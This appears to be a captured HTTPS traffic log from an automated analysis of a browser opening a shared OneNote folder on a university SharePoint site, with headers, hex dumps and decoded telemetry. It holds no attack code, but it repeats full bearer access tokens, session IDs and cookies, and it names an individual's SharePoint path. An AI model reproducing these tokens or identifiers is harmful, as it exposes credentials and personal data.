                                                X-AccessToken: eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsIng1dCI6ImFrUFRFTzRYU0N4c3hXOTBHMl9Zd1lWRGdIYyJ9.eyJhdWQiOiJ3b3BpL2luc2FjZW50cmUtbXkuc2hhcmVwb2ludC5jb21AZjc0MjE0NTAtZGYxNi00NzE0LWFkYTEtMzk1MzkwY2I5MWQzIiwiaXNzIjoiMDAwMDAwMDMtMDAwMC0wZmYxLWNlMDAtMDAwMDAwMDAwMDAwQDkwMTQwMTIyLTg1MTYtMTFlMS04ZWZmLTQ5MzA0OTI0MDE5YiIsIm5iZiI6IjE2NjQ4MDQyOTYiLCJleHAiOiIxNjY0ODQwMjk2IiwibmFtZWlkIjoiMCMuZnxtZW1iZXJzaGlwfHVybiUzYXNwbyUzYWFub24jNGMyYmRlM2RjNmYxYmRkOTJiMTQ2ZmVkN2E2ZDI2NzNiZTZhYmEzOGU4MmRhMGYzNzhlMDNmODAzYTE2MTY0YyIsIm5paSI6Im1pY3Jvc29mdC5zaGFyZXBvaW50IiwiaXN1c2VyIjoidHJ1ZSIsImNhY2hla2V5IjoiMGguZnxtZW1iZXJzaGlwfHVybiUzYXNwbyUzYWFub24jNGMyYmRlM2RjNmYxYmRkOTJiMTQ2ZmVkN2E2ZDI2NzNiZTZhYmEzOGU4MmRhMGYzNzhlMDNmODAzYTE2MTY0YyIsInNoYXJpbmdpZCI6IlkzbSt5S21nQWt1SEsrbFFjWjJSL3ciLCJpc2xvb3BiYWNrIjoiVHJ1ZSIsImFwcGN0eCI6IjVjNjI3MzI0YjRlNjQ5NjdhMzFhNWMyZTI3NjdhMmEwO01NSW9kVHVrMnhacDRTTFIyUlQ3cU9HcTNsTT07RGVmYXVsdDsxMmNlNzM1ZTFmNGM0YjkyOTQzNGQ5Nzk4YzJmY2JiOTs7VHJ1ZTs7OzA7ZTcwMzZiYTAtNDAwNC01MDAwLTQ3MDQtOGM3OTc3Zjk2M2M5In0.EWb66LDcPK9or86SYiXEnS8X85go_GF6jrytmNe-VM0DP1xedkdH8-P7maQkiGV1uoKn2Q3P4K07W8GXPgYZ5y8fXzywqlJykkoJzCJPRAx6O_cBiZszwxDu1rJtgjSTldsdPBQi-x4isn_tXs1kVY3k0U38ib-UTDhESo5GkrQ59aM3v5L0NqOv7JFyPd5UFya1amQrzflYMZLjlIR7Cpl8sbK80iNccduMe_YJ8j12fHoZippN9rN6taMKDu9wT0A9JTtAxplzwDJbTKBuRr6bA7EzroK8GpTlnMKJldwuHWyPyVYQHIAwW8osIl11pJ4nzIiwd96ynH3CffKLmQ
                                                X-UserSessionId: f4fb35ab-872b-4831-80cd-60f1741f9c31
                                                sec-ch-ua-mobile: ?0
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                Content-Type: application/x-www-form-urlencoded; charset=UTF-8
                                                X-UserType: WOPI
                                                X-IsCoauthSession: true
                                                X-WacCluster: GEU2
                                                Accept: */*
                                                Origin: https://euc-onenote.officeapps.live.com
                                                Sec-Fetch-Site: same-origin
                                                Sec-Fetch-Mode: cors
                                                Sec-Fetch-Dest: empty
                                                Referer: https://euc-onenote.officeapps.live.com/o/onenoteframe.aspx?ui=fr%2DFR&rs=fr%2DFR&wopisrc=https%3A%2F%2Finsacentre-my.sharepoint.com%2Fpersonal%2Fchristel_chevereau_insa-cvl_fr%2F_vti_bin%2Fwopi.ashx%2Ffolders%2F5c627324b4e64967a31a5c2e2767a2a0&wdenableroaming=1&mscc=0&wdodb=1&hid=E7036BA0-4004-5000-4704-8C7977F963C9&wdorigin=Sharing&wdhostclicktime=1664836694371&jsapi=1&jsapiver=v1&newsession=1&corrid=f4fb35ab-872b-4831-80cd-60f1741f9c31&usid=f4fb35ab-872b-4831-80cd-60f1741f9c31&sftc=1&cac=1&mtf=1&sfp=1&readonly=1&wdredirectionreason=Force_SingleStepBoot&rct=Medium&ctp=LeastProtected
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                Cookie: BIGipCookie=000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000; PrivNote=-1; WacUPToggleState=%7B%22CCS%22%3A0%7D; GEU2-ARRAffinity=6d4bbee26ee2cd267faa982251fa1253c2809c10aef235fbcf94243ec19857ca
                                                2022-10-03 13:39:06 UTC668OUTData Raw: 7b 22 54 22 3a 31 36 36 34 38 33 36 37 31 35 35 36 31 2c 22 4c 22 3a 5b 7b 22 47 22 3a 35 32 33 36 34 32 35 31 35 2c 22 54 22 3a 37 30 2c 22 4d 22 3a 22 43 68 65 63 6b 57 6f 70 69 48 6f 73 74 20 49 73 48 6f 73 74 46 72 61 6d 65 54 72 75 73 74 65 64 20 56 61 6c 75 65 3a 35 20 41 70 70 43 6f 72 72 65 6c 61 74 69 6f 6e 49 64 3a 39 37 32 34 30 30 30 61 2d 33 38 31 30 2d 62 62 30 61 2d 66 31 31 65 2d 64 38 37 65 62 31 33 61 33 65 31 30 2e 22 2c 22 43 22 3a 31 34 30 33 2c 22 44 22 3a 35 30 7d 2c 7b 22 47 22 3a 35 32 33 33 36 30 32 35 37 2c 22 54 22 3a 37 33 2c 22 4d 22 3a 22 41 63 74 69 76 61 74 69 6f 6e 52 75 6e 74 69 6d 65 54 79 70 65 3a 20 32 7c 43 6f 72 72 65 6c 61 74 69 6f 6e 49 64 3a 20 39 37 32 34 30 30 30 61 2d 33 38 31 30 2d 62 62 30 61 2d 66 31 31 65
                                                Data Ascii: {"T":1664836715561,"L":[{"G":523642515,"T":70,"M":"CheckWopiHost IsHostFrameTrusted Value:5 AppCorrelationId:9724000a-3810-bb0a-f11e-d87eb13a3e10.","C":1403,"D":50},{"G":523360257,"T":73,"M":"ActivationRuntimeType: 2|CorrelationId: 9724000a-3810-bb0a-f11e
                                                2022-10-03 13:39:06 UTC684OUTData Raw: 22 66 61 6c 73 65 5c 22 2c 20 5c 22 4f 63 70 73 49 73 45 6e 61 62 6c 65 64 5c 22 3a 20 5c 22 74 72 75 65 5c 22 2c 20 5c 22 46 47 49 6e 69 74 44 65 6c 61 79 54 69 6d 65 5c 22 3a 20 5c 22 31 36 30 30 30 5c 22 2c 20 5c 22 53 68 6f 77 45 6d 61 69 6c 41 64 64 72 65 73 73 5c 22 3a 20 5c 22 66 61 6c 73 65 5c 22 2c 20 5c 22 73 75 72 76 65 79 45 6e 61 62 6c 65 64 5c 22 3a 20 5c 22 74 72 75 65 5c 22 2c 20 5c 22 67 6f 76 65 72 6e 61 6e 63 65 53 65 72 76 69 63 65 45 6e 61 62 6c 65 64 5c 22 3a 20 5c 22 74 72 75 65 5c 22 2c 20 5c 22 67 6f 76 65 72 6e 61 6e 63 65 53 65 72 76 69 63 65 43 6f 6e 66 69 67 5c 22 3a 20 5c 22 7b 5c 22 72 65 74 72 79 5c 22 3a 30 2c 5c 22 74 69 6d 65 6f 75 74 5c 22 3a 31 30 30 30 30 2c 5c 22 73 69 6d 70 6c 65 52 65 71 75 65 73 74 45 6e 61 62 6c
                                                Data Ascii: "false\", \"OcpsIsEnabled\": \"true\", \"FGInitDelayTime\": \"16000\", \"ShowEmailAddress\": \"false\", \"surveyEnabled\": \"true\", \"governanceServiceEnabled\": \"true\", \"governanceServiceConfig\": \"{\"retry\":0,\"timeout\":10000,\"simpleRequestEnabl
                                                2022-10-03 13:39:06 UTC700OUTData Raw: 30 38 30 34 2c 22 54 22 3a 31 36 35 34 36 2c 22 4d 22 3a 22 7b 5c 22 55 72 6c 5c 22 3a 5c 22 68 74 74 70 73 3a 2f 2f 73 74 6f 72 61 67 65 2e 6c 69 76 65 2e 63 6f 6d 2f 6d 79 64 61 74 61 2f 6d 79 70 72 6f 66 69 6c 65 2f 65 78 70 72 65 73 73 69 6f 6e 70 72 6f 66 69 6c 65 2f 70 72 6f 66 69 6c 65 70 68 6f 74 6f 3a 55 73 65 72 54 69 6c 65 53 74 61 74 69 63 2c 55 73 65 72 54 69 6c 65 53 6d 61 6c 6c 2f 4d 65 43 6f 6e 74 72 6f 6c 4d 65 64 69 75 6d 55 73 65 72 54 69 6c 65 5c 22 2c 5c 22 49 6e 69 74 69 61 74 6f 72 54 79 70 65 5c 22 3a 5c 22 69 6d 67 5c 22 2c 5c 22 52 65 64 69 72 65 63 74 53 74 61 72 74 5c 22 3a 5c 22 30 5c 22 2c 5c 22 52 65 64 69 72 65 63 74 45 6e 64 5c 22 3a 5c 22 30 5c 22 2c 5c 22 46 65 74 63 68 53 74 61 72 74 5c 22 3a 5c 22 31 38 31 31 33 2e 31
                                                Data Ascii: 0804,"T":16546,"M":"{\"Url\":\"https://storage.live.com/mydata/myprofile/expressionprofile/profilephoto:UserTileStatic,UserTileSmall/MeControlMediumUserTile\",\"InitiatorType\":\"img\",\"RedirectStart\":\"0\",\"RedirectEnd\":\"0\",\"FetchStart\":\"18113.1
                                                2022-10-03 13:39:06 UTC709INHTTP/1.1 200 OK
                                                Cache-Control: private
                                                Content-Type: text/plain
                                                P3P: CP="CAO DSP COR ADMa DEV CONi TELi CUR PSA PSD TAI IVDi OUR SAMi BUS DEM NAV STA UNI COM INT PHY ONL FIN PUR"
                                                Set-Cookie:
                                                X-CorrelationId: 64e7d9f3-c2e9-49e7-bf91-796b41559ef7
                                                X-UserSessionId: f4fb35ab-872b-4831-80cd-60f1741f9c31
                                                Strict-Transport-Security: max-age=31536000
                                                Timing-Allow-Origin: *
                                                X-OfficeFE: AM1PEPF0000069D
                                                X-OfficeVersion: 16.0.15707.41015
                                                X-OfficeCluster: GEU2
                                                Access-Control-Allow-Origin: https://euc-onenote.officeapps.live.com
                                                Access-Control-Expose-Headers: X-EndSession, X-CorrelationId, X-OfficeFE, X-NewKey, X-bULS-SuppressionETag, X-bULS-SuppressedTags
                                                Cross-Origin-Resource-Policy: cross-origin
                                                X-bULS-SuppressionETag: D4C663A7BB170EC4D6D0C2C9132C150D3CBB915A
                                                X-Content-Type-Options: nosniff
                                                X-Download-Options: noopen
                                                Content-Disposition: attachment
                                                X-OFFICEFD: AM1PEPF0000069D
                                                X-Cache: CONFIG_NOCACHE
                                                X-MSEdge-Flight: 2i49=afd_wacinfra4,2i4a=afd_wacinfra5
                                                X-MSEdge-Features: tasmigration015,typeheadertest,afd_waccluster,afd_wordcapacity_2,afd_wacinfra4,afd_wacinfra5
                                                X-MSEdge-Ref: Ref A: 1D3D494E78AB4C8288E922E9B6FFC88F Ref B: AMS231032602005 Ref C: 2022-10-03T13:39:06Z
                                                Date: Mon, 03 Oct 2022 13:39:05 GMT
                                                Connection: close
                                                Content-Length: 0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                4192.168.2.34971413.107.6.171443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                TimestampkBytes transferredDirectionData
                                                2022-10-03 13:38:17 UTC87OUTPOST /o/RemoteTelemetry.ashx?usid=f4fb35ab-872b-4831-80cd-60f1741f9c31 HTTP/1.1
                                                Host: euc-onenote.officeapps.live.com
                                                Connection: keep-alive
                                                Content-Length: 118
                                                sec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"
                                                sec-ch-ua-mobile: ?0
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                sec-ch-ua-platform: "Windows"
                                                Content-Type: text/plain;charset=UTF-8
                                                Accept: */*
                                                Origin: https://insacentre-my.sharepoint.com
                                                Sec-Fetch-Site: cross-site
                                                Sec-Fetch-Mode: no-cors
                                                Sec-Fetch-Dest: empty
                                                Referer: https://insacentre-my.sharepoint.com/
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                2022-10-03 13:38:17 UTC88OUTData Raw: 7b 22 74 79 70 65 22 3a 22 4a 53 41 50 49 5f 53 54 41 54 45 22 2c 22 70 61 79 6c 6f 61 64 4a 73 6f 6e 22 3a 22 7b 5c 22 61 70 70 6c 69 63 61 74 69 6f 6e 5c 22 3a 5c 22 4f 6e 65 4e 6f 74 65 5c 22 2c 5c 22 62 75 69 6c 64 5c 22 3a 5c 22 31 36 2e 30 2e 31 35 37 30 37 2e 34 31 30 31 35 5c 22 2c 5c 22 73 74 61 74 65 5c 22 3a 5c 22 69 6e 69 74 5c 22 7d 22 7d
                                                Data Ascii: {"type":"JSAPI_STATE","payloadJson":"{\"application\":\"OneNote\",\"build\":\"16.0.15707.41015\",\"state\":\"init\"}"}
                                                2022-10-03 13:38:17 UTC88INHTTP/1.1 200 OK
                                                Cache-Control: private
                                                P3P: CP="CAO DSP COR ADMa DEV CONi TELi CUR PSA PSD TAI IVDi OUR SAMi BUS DEM NAV STA UNI COM INT PHY ONL FIN PUR"
                                                Set-Cookie:
                                                X-CorrelationId: 4ae6901b-60b6-4c2d-8459-b45a952b7798
                                                X-UserSessionId: f4fb35ab-872b-4831-80cd-60f1741f9c31
                                                Strict-Transport-Security: max-age=31536000
                                                Timing-Allow-Origin: *
                                                X-OfficeFE: PA1PEPF0000BDBC
                                                X-OfficeVersion: 16.0.15707.41015
                                                X-OfficeCluster: GEU5
                                                Access-Control-Allow-Origin: https://insacentre-my.sharepoint.com
                                                X-Content-Type-Options: nosniff
                                                X-Download-Options: noopen
                                                Content-Disposition: attachment
                                                X-OFFICEFD: PA1PEPF0000BDBC
                                                X-Cache: CONFIG_NOCACHE
                                                X-MSEdge-Flight: 2i49=afd_wacinfra4,2i4a=afd_wacinfra5
                                                X-MSEdge-Features: typeheadertest,afd_waccluster,afd_onenoteslice,afd_wacinfra4,afd_wacinfra5
                                                X-MSEdge-Ref: Ref A: BC0F10C15B9F4A5FA7C9C723D9C3A0C8 Ref B: AMS231032608021 Ref C: 2022-10-03T13:38:17Z
                                                Date: Mon, 03 Oct 2022 13:38:17 GMT
                                                Connection: close
                                                Content-Length: 0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                40192.168.2.34993913.107.6.171443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                TimestampkBytes transferredDirectionData
                                                2022-10-03 13:39:23 UTC710OUTPOST /o/OneNote.ashx?perfTag=GetChanges_2 HTTP/1.1
                                                Host: euc-onenote.officeapps.live.com
                                                Connection: keep-alive
                                                Content-Length: 5397
                                                sec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"
                                                X-ServerSideRendering: RenderingFull
                                                X-WacFrontEnd: AM1PEPF000094C7
                                                X-OfficeVersion: 16.0.15707.41015
                                                X-Key: 5CkbCfV/c5WRPlfo2bTVsG0FKIqu826w6sof/5159dg=,638004010975601703
                                                X-WacUserAgent: MSWACONSync
                                                X-AccessTokenTtl: 1664840296804
                                                X-Requested-With: XMLHttpRequest
                                                X-xhr: 1
                                                sec-ch-ua-platform: "Windows"
                                                haep: 1
                                                X-AccessToken: eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsIng1dCI6ImFrUFRFTzRYU0N4c3hXOTBHMl9Zd1lWRGdIYyJ9.eyJhdWQiOiJ3b3BpL2luc2FjZW50cmUtbXkuc2hhcmVwb2ludC5jb21AZjc0MjE0NTAtZGYxNi00NzE0LWFkYTEtMzk1MzkwY2I5MWQzIiwiaXNzIjoiMDAwMDAwMDMtMDAwMC0wZmYxLWNlMDAtMDAwMDAwMDAwMDAwQDkwMTQwMTIyLTg1MTYtMTFlMS04ZWZmLTQ5MzA0OTI0MDE5YiIsIm5iZiI6IjE2NjQ4MDQyOTYiLCJleHAiOiIxNjY0ODQwMjk2IiwibmFtZWlkIjoiMCMuZnxtZW1iZXJzaGlwfHVybiUzYXNwbyUzYWFub24jNGMyYmRlM2RjNmYxYmRkOTJiMTQ2ZmVkN2E2ZDI2NzNiZTZhYmEzOGU4MmRhMGYzNzhlMDNmODAzYTE2MTY0YyIsIm5paSI6Im1pY3Jvc29mdC5zaGFyZXBvaW50IiwiaXN1c2VyIjoidHJ1ZSIsImNhY2hla2V5IjoiMGguZnxtZW1iZXJzaGlwfHVybiUzYXNwbyUzYWFub24jNGMyYmRlM2RjNmYxYmRkOTJiMTQ2ZmVkN2E2ZDI2NzNiZTZhYmEzOGU4MmRhMGYzNzhlMDNmODAzYTE2MTY0YyIsInNoYXJpbmdpZCI6IlkzbSt5S21nQWt1SEsrbFFjWjJSL3ciLCJpc2xvb3BiYWNrIjoiVHJ1ZSIsImFwcGN0eCI6IjVjNjI3MzI0YjRlNjQ5NjdhMzFhNWMyZTI3NjdhMmEwO01NSW9kVHVrMnhacDRTTFIyUlQ3cU9HcTNsTT07RGVmYXVsdDsxMmNlNzM1ZTFmNGM0YjkyOTQzNGQ5Nzk4YzJmY2JiOTs7VHJ1ZTs7OzA7ZTcwMzZiYTAtNDAwNC01MDAwLTQ3MDQtOGM3OTc3Zjk2M2M5In0.EWb66LDcPK9or86SYiXEnS8X85go_GF6jrytmNe-VM0DP1xedkdH8-P7maQkiGV1uoKn2Q3P4K07W8GXPgYZ5y8fXzywqlJykkoJzCJPRAx6O_cBiZszwxDu1rJtgjSTldsdPBQi-x4isn_tXs1kVY3k0U38ib-UTDhESo5GkrQ59aM3v5L0NqOv7JFyPd5UFya1amQrzflYMZLjlIR7Cpl8sbK80iNccduMe_YJ8j12fHoZippN9rN6taMKDu9wT0A9JTtAxplzwDJbTKBuRr6bA7EzroK8GpTlnMKJldwuHWyPyVYQHIAwW8osIl11pJ4nzIiwd96ynH3CffKLmQ
                                                X-UserSessionId: f4fb35ab-872b-4831-80cd-60f1741f9c31
                                                sec-ch-ua-mobile: ?0
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                Content-Type: application/json; charset=UTF-8
                                                X-UserType: WOPI
                                                X-IsCoauthSession: true
                                                X-WacCluster: GEU2
                                                Accept: */*
                                                Origin: https://euc-onenote.officeapps.live.com
                                                Sec-Fetch-Site: same-origin
                                                Sec-Fetch-Mode: cors
                                                Sec-Fetch-Dest: empty
                                                Referer: https://euc-onenote.officeapps.live.com/o/onenoteframe.aspx?ui=fr%2DFR&rs=fr%2DFR&wopisrc=https%3A%2F%2Finsacentre-my.sharepoint.com%2Fpersonal%2Fchristel_chevereau_insa-cvl_fr%2F_vti_bin%2Fwopi.ashx%2Ffolders%2F5c627324b4e64967a31a5c2e2767a2a0&wdenableroaming=1&mscc=0&wdodb=1&hid=E7036BA0-4004-5000-4704-8C7977F963C9&wdorigin=Sharing&wdhostclicktime=1664836694371&jsapi=1&jsapiver=v1&newsession=1&corrid=f4fb35ab-872b-4831-80cd-60f1741f9c31&usid=f4fb35ab-872b-4831-80cd-60f1741f9c31&sftc=1&cac=1&mtf=1&sfp=1&readonly=1&wdredirectionreason=Force_SingleStepBoot&rct=Medium&ctp=LeastProtected
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                Cookie: BIGipCookie=000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000; PrivNote=-1; WacUPToggleState=%7B%22CCS%22%3A0%7D; GEU2-ARRAffinity=6d4bbee26ee2cd267faa982251fa1253c2809c10aef235fbcf94243ec19857ca
                                                2022-10-03 13:39:23 UTC713OUTData Raw: 7b 22 4d 6f 64 65 22 3a 31 2c 22 73 72 73 22 3a 5b 5b 32 2c 7b 22 4f 70 65 72 61 74 69 6f 6e 49 64 22 3a 31 2c 22 44 65 70 65 6e 64 65 6e 74 4f 6e 22 3a 30 2c 22 4c 6f 63 61 6c 43 6f 62 61 6c 74 53 65 73 73 69 6f 6e 49 64 22 3a 6e 75 6c 6c 2c 22 4c 6f 63 61 6c 43 6f 62 61 6c 74 4d 61 63 68 69 6e 65 49 64 22 3a 6e 75 6c 6c 2c 22 4c 6f 63 61 6c 43 6f 62 61 6c 74 43 6c 75 73 74 65 72 49 64 22 3a 6e 75 6c 6c 2c 22 4c 6f 63 61 6c 43 6f 62 61 6c 74 53 65 73 73 69 6f 6e 48 61 73 42 61 63 6b 75 70 22 3a 66 61 6c 73 65 2c 22 57 61 63 69 69 45 6e 61 62 6c 65 64 52 65 71 75 65 73 74 73 22 3a 30 2c 22 53 65 74 74 69 6e 67 73 52 6f 75 74 65 64 54 6f 53 65 72 76 65 72 22 3a 30 2c 22 4c 69 6e 65 61 67 65 49 64 22 3a 6e 75 6c 6c 2c 22 46 69 6c 65 49 64 22 3a 22 57 4f 50
                                                Data Ascii: {"Mode":1,"srs":[[2,{"OperationId":1,"DependentOn":0,"LocalCobaltSessionId":null,"LocalCobaltMachineId":null,"LocalCobaltClusterId":null,"LocalCobaltSessionHasBackup":false,"WaciiEnabledRequests":0,"SettingsRoutedToServer":0,"LineageId":null,"FileId":"WOP
                                                2022-10-03 13:39:23 UTC719INHTTP/1.1 200 OK
                                                Cache-Control: no-cache
                                                Pragma: no-cache
                                                Content-Length: 430
                                                Content-Type: application/json; charset=utf-8
                                                Expires: -1
                                                P3P: CP="CAO DSP COR ADMa DEV CONi TELi CUR PSA PSD TAI IVDi OUR SAMi BUS DEM NAV STA UNI COM INT PHY ONL FIN PUR"
                                                Set-Cookie:
                                                X-ROUTED-TO-TARGET-SERVER-PATH: WAC_WFE_AFFINITY_TARGET_URL
                                                X-CorrelationId: 0fb9817e-b88a-4245-96dd-5fb80d4933c9
                                                X-UserSessionId: f4fb35ab-872b-4831-80cd-60f1741f9c31
                                                Strict-Transport-Security: max-age=31536000
                                                Timing-Allow-Origin: *
                                                X-CorrelationId: 0fb9817e-b88a-4245-96dd-5fb80d4933c9
                                                X-UserSessionId: f4fb35ab-872b-4831-80cd-60f1741f9c31
                                                Strict-Transport-Security: max-age=31536000
                                                Timing-Allow-Origin: *
                                                X-OfficeFE: AM1PEPF000094C7
                                                X-OfficeVersion: 16.0.15707.41015
                                                X-OfficeCluster: GEU2
                                                X-Content-Type-Options: nosniff
                                                X-Download-Options: noopen
                                                Content-Disposition: attachment
                                                X-OFFICEFD: AM1PEPF000006C5
                                                X-WacFrontEnd: AM1PEPF000094C7
                                                X-Powered-By: ARR/3.0
                                                X-Cache: CONFIG_NOCACHE
                                                X-MSEdge-Flight: 2i49=afd_wacinfra4,2i4a=afd_wacinfra5
                                                X-MSEdge-Features: typeheadertest,afd_waccluster,afd_wacinfra4,afd_wacinfra5
                                                X-MSEdge-Ref: Ref A: E025F4761A1F4E3EBFB2F9E9809A7267 Ref B: AMS231032608051 Ref C: 2022-10-03T13:39:23Z
                                                Date: Mon, 03 Oct 2022 13:39:22 GMT
                                                Connection: close
                                                2022-10-03 13:39:23 UTC720INData Raw: ef bb bf 7b 22 52 65 73 70 6f 6e 73 65 73 22 3a 5b 5b 32 2c 7b 22 4f 70 65 72 61 74 69 6f 6e 49 64 22 3a 31 2c 22 53 74 61 74 75 73 43 6f 64 65 22 3a 30 2c 22 52 61 77 43 65 6c 6c 53 74 6f 72 61 67 65 45 72 72 6f 72 43 6f 64 65 22 3a 22 22 2c 22 53 65 72 76 65 72 50 61 67 65 53 74 61 74 73 54 72 61 63 65 22 3a 22 22 2c 22 50 61 72 74 4d 65 72 67 65 49 6e 66 6f 22 3a 30 2c 22 52 6f 6f 74 43 65 6c 6c 49 64 22 3a 22 6e 75 6c 6c 22 2c 22 41 76 61 69 6c 61 62 6c 65 46 69 6c 65 41 63 63 65 73 73 22 3a 32 2c 22 52 65 76 69 73 69 6f 6e 4c 69 73 74 22 3a 5b 5d 2c 22 50 69 6e 52 65 76 69 73 69 6f 6e 46 6f 72 41 75 67 4c 6f 6f 70 52 65 73 70 6f 6e 73 65 22 3a 30 7d 5d 2c 5b 32 2c 7b 22 4f 70 65 72 61 74 69 6f 6e 49 64 22 3a 32 2c 22 53 74 61 74 75 73 43 6f 64 65 22
                                                Data Ascii: {"Responses":[[2,{"OperationId":1,"StatusCode":0,"RawCellStorageErrorCode":"","ServerPageStatsTrace":"","PartMergeInfo":0,"RootCellId":"null","AvailableFileAccess":2,"RevisionList":[],"PinRevisionForAugLoopResponse":0}],[2,{"OperationId":2,"StatusCode"


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                41192.168.2.34995713.107.6.171443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                TimestampkBytes transferredDirectionData
                                                2022-10-03 13:39:37 UTC720OUTPOST /o/RemoteUls.ashx?build=16.0.15707.41015&waccluster=GEU2 HTTP/1.1
                                                Host: euc-onenote.officeapps.live.com
                                                Connection: keep-alive
                                                Content-Length: 1676
                                                sec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"
                                                X-WacFrontEnd: AM1PEPF000094C7
                                                X-OfficeVersion: 16.0.15707.41015
                                                X-Key: 5CkbCfV/c5WRPlfo2bTVsG0FKIqu826w6sof/5159dg=,638004010975601703
                                                X-WacUserAgent: MSWACONSync
                                                X-bULS-SuppressionETag: D4C663A7BB170EC4D6D0C2C9132C150D3CBB915A
                                                X-AccessTokenTtl: 1664840296804
                                                X-Requested-With: XMLHttpRequest
                                                X-xhr: 1
                                                sec-ch-ua-platform: "Windows"
                                                haep: 1
                                                X-AccessToken: eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsIng1dCI6ImFrUFRFTzRYU0N4c3hXOTBHMl9Zd1lWRGdIYyJ9.eyJhdWQiOiJ3b3BpL2luc2FjZW50cmUtbXkuc2hhcmVwb2ludC5jb21AZjc0MjE0NTAtZGYxNi00NzE0LWFkYTEtMzk1MzkwY2I5MWQzIiwiaXNzIjoiMDAwMDAwMDMtMDAwMC0wZmYxLWNlMDAtMDAwMDAwMDAwMDAwQDkwMTQwMTIyLTg1MTYtMTFlMS04ZWZmLTQ5MzA0OTI0MDE5YiIsIm5iZiI6IjE2NjQ4MDQyOTYiLCJleHAiOiIxNjY0ODQwMjk2IiwibmFtZWlkIjoiMCMuZnxtZW1iZXJzaGlwfHVybiUzYXNwbyUzYWFub24jNGMyYmRlM2RjNmYxYmRkOTJiMTQ2ZmVkN2E2ZDI2NzNiZTZhYmEzOGU4MmRhMGYzNzhlMDNmODAzYTE2MTY0YyIsIm5paSI6Im1pY3Jvc29mdC5zaGFyZXBvaW50IiwiaXN1c2VyIjoidHJ1ZSIsImNhY2hla2V5IjoiMGguZnxtZW1iZXJzaGlwfHVybiUzYXNwbyUzYWFub24jNGMyYmRlM2RjNmYxYmRkOTJiMTQ2ZmVkN2E2ZDI2NzNiZTZhYmEzOGU4MmRhMGYzNzhlMDNmODAzYTE2MTY0YyIsInNoYXJpbmdpZCI6IlkzbSt5S21nQWt1SEsrbFFjWjJSL3ciLCJpc2xvb3BiYWNrIjoiVHJ1ZSIsImFwcGN0eCI6IjVjNjI3MzI0YjRlNjQ5NjdhMzFhNWMyZTI3NjdhMmEwO01NSW9kVHVrMnhacDRTTFIyUlQ3cU9HcTNsTT07RGVmYXVsdDsxMmNlNzM1ZTFmNGM0YjkyOTQzNGQ5Nzk4YzJmY2JiOTs7VHJ1ZTs7OzA7ZTcwMzZiYTAtNDAwNC01MDAwLTQ3MDQtOGM3OTc3Zjk2M2M5In0.EWb66LDcPK9or86SYiXEnS8X85go_GF6jrytmNe-VM0DP1xedkdH8-P7maQkiGV1uoKn2Q3P4K07W8GXPgYZ5y8fXzywqlJykkoJzCJPRAx6O_cBiZszwxDu1rJtgjSTldsdPBQi-x4isn_tXs1kVY3k0U38ib-UTDhESo5GkrQ59aM3v5L0NqOv7JFyPd5UFya1amQrzflYMZLjlIR7Cpl8sbK80iNccduMe_YJ8j12fHoZippN9rN6taMKDu9wT0A9JTtAxplzwDJbTKBuRr6bA7EzroK8GpTlnMKJldwuHWyPyVYQHIAwW8osIl11pJ4nzIiwd96ynH3CffKLmQ
                                                X-UserSessionId: f4fb35ab-872b-4831-80cd-60f1741f9c31
                                                sec-ch-ua-mobile: ?0
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                Content-Type: application/x-www-form-urlencoded; charset=UTF-8
                                                X-UserType: WOPI
                                                X-IsCoauthSession: true
                                                X-WacCluster: GEU2
                                                Accept: */*
                                                Origin: https://euc-onenote.officeapps.live.com
                                                Sec-Fetch-Site: same-origin
                                                Sec-Fetch-Mode: cors
                                                Sec-Fetch-Dest: empty
                                                Referer: https://euc-onenote.officeapps.live.com/o/onenoteframe.aspx?ui=fr%2DFR&rs=fr%2DFR&wopisrc=https%3A%2F%2Finsacentre-my.sharepoint.com%2Fpersonal%2Fchristel_chevereau_insa-cvl_fr%2F_vti_bin%2Fwopi.ashx%2Ffolders%2F5c627324b4e64967a31a5c2e2767a2a0&wdenableroaming=1&mscc=0&wdodb=1&hid=E7036BA0-4004-5000-4704-8C7977F963C9&wdorigin=Sharing&wdhostclicktime=1664836694371&jsapi=1&jsapiver=v1&newsession=1&corrid=f4fb35ab-872b-4831-80cd-60f1741f9c31&usid=f4fb35ab-872b-4831-80cd-60f1741f9c31&sftc=1&cac=1&mtf=1&sfp=1&readonly=1&wdredirectionreason=Force_SingleStepBoot&rct=Medium&ctp=LeastProtected
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                Cookie: BIGipCookie=000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000; PrivNote=-1; WacUPToggleState=%7B%22CCS%22%3A0%7D; GEU2-ARRAffinity=6d4bbee26ee2cd267faa982251fa1253c2809c10aef235fbcf94243ec19857ca
